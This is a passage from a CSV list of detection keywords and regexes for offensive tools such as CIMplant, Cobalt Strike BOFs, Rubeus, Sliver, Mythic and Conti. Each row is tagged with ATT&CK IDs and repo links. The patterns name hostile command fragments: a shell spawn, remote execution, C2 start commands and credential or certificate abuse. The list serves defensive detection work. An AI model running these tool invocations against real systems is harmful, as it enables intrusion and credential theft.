Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c all -d * --domaincontroller *",".{0,1000}\s\-c\sall\s\-d\s.{0,1000}\s\-\-domaincontroller\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* -c command_exec --execute tasklist*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\stasklist.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c command_exec --execute whoami*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\swhoami.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c CredEnum.c*",".{0,1000}\s\-c\sCredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* -c DCOnly -d * -u * -p * -o /tmp*",".{0,1000}\s\-c\sDCOnly\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-o\s\/tmp.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* -c edr_query *",".{0,1000}\s\-c\sedr_query\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","risk of False positive","4","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* -c logon_events * -u *",".{0,1000}\s\-c\slogon_events\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c ls --directory * -u * -p *",".{0,1000}\s\-c\sls\s\-\-directory\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c process_kill --process *",".{0,1000}\s\-c\sprocess_kill\s\-\-process\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c service_mod --execute create -s *",".{0,1000}\s\-c\sservice_mod\s\-\-execute\screate\s\-s\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query 
remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c upload --fileto * --file *",".{0,1000}\s\-c\supload\s\-\-fileto\s.{0,1000}\s\-\-file\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c vacant_system * -u *",".{0,1000}\s\-c\svacant_system\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c -w methods.txt -p 127.0.0.1*",".{0,1000}\s\-c\s\-w\smethods\.txt\s\-p\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -c -z range*1-10 --hc=BBB http*",".{0,1000}\s\-c\s\-z\srange.{0,1000}1\-10\s\-\-hc\=BBB\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* c:\\Temp\\lua.log*",".{0,1000}\sc\:\\\\Temp\\\\lua\.log.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a 
collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "* C:\ProgramData\sh.txt*",".{0,1000}\sC\:\\ProgramData\\sh\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* C:\temp\w.log*",".{0,1000}\sC\:\\temp\\w\.log.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* C:\Users\Public\build.bat*",".{0,1000}\sC\:\\Users\\Public\\build\.bat.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\build.vbs*",".{0,1000}\sC\:\\Users\\Public\\build\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\DtcInstall.txt*",".{0,1000}\sC\:\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* c2 add *",".{0,1000}\sc2\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* c2 start http *",".{0,1000}\sc2\sstart\shttp\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* c2_server.py*",".{0,1000}\sc2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and 
control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "* c2profile.Name*",".{0,1000}\sc2profile\.Name.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* -c2server *",".{0,1000}\s\-c2server\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* --CaCertPath *.pfx --CaCertPassword *",".{0,1000}\s\-\-CaCertPath\s.{0,1000}\.pfx\s\-\-CaCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* CallDirect.py*",".{0,1000}\sCallDirect\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* CallStranger.py*",".{0,1000}\sCallStranger\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* camhacker *",".{0,1000}\scamhacker\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* camhacker:/CamHacker*",".{0,1000}\scamhacker\:\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "* can now impersonate users on * via S4U2Proxy*",".{0,1000}\scan\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Can search all Teams messages in all channels that are readable by the current user*",".{0,1000}\sCan\ssearch\sall\sTeams\smessages\sin\sall\schannels\sthat\sare\sreadable\sby\sthe\scurrent\suser.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* -caplet *.cap",".{0,1000}\s\-caplet\s.{0,1000}\.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* cassandra-brute.nse*",".{0,1000}\scassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cassandra-info.nse*",".{0,1000}\scassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* catspin.sh *",".{0,1000}\scatspin\.sh\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL*",".{0,1000}\sCC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "* --ccache-ticket *",".{0,1000}\s\-\-ccache\-ticket\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active 
Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* cccam-version.nse*",".{0,1000}\scccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ccmpwn.py*",".{0,1000}\sccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "* --certdump *",".{0,1000}\s\-\-certdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* certipy-ad*",".{0,1000}\scertipy\-ad.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* changepw * /ticket:*",".{0,1000}\schangepw\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* chaos.exe *",".{0,1000}\schaos\.exe\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "* charlotte.cpp*",".{0,1000}\scharlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* charlotte.dll *",".{0,1000}\scharlotte\.dll\s.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* CharSubroutine-Macro.xls*",".{0,1000}\sCharSubroutine\-Macro\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* -CheckShareAccess -Verbose*",".{0,1000}\s\-CheckShareAccess\s\-Verbose.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "* --check-tor *",".{0,1000}\s\-\-check\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -ChildPath *fodhelper.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}fodhelper\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -ChildPath *sdclt.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}sdclt\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* chimera.py *",".{0,1000}\schimera\.py\s.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "* chimera.sh*",".{0,1000}\schimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
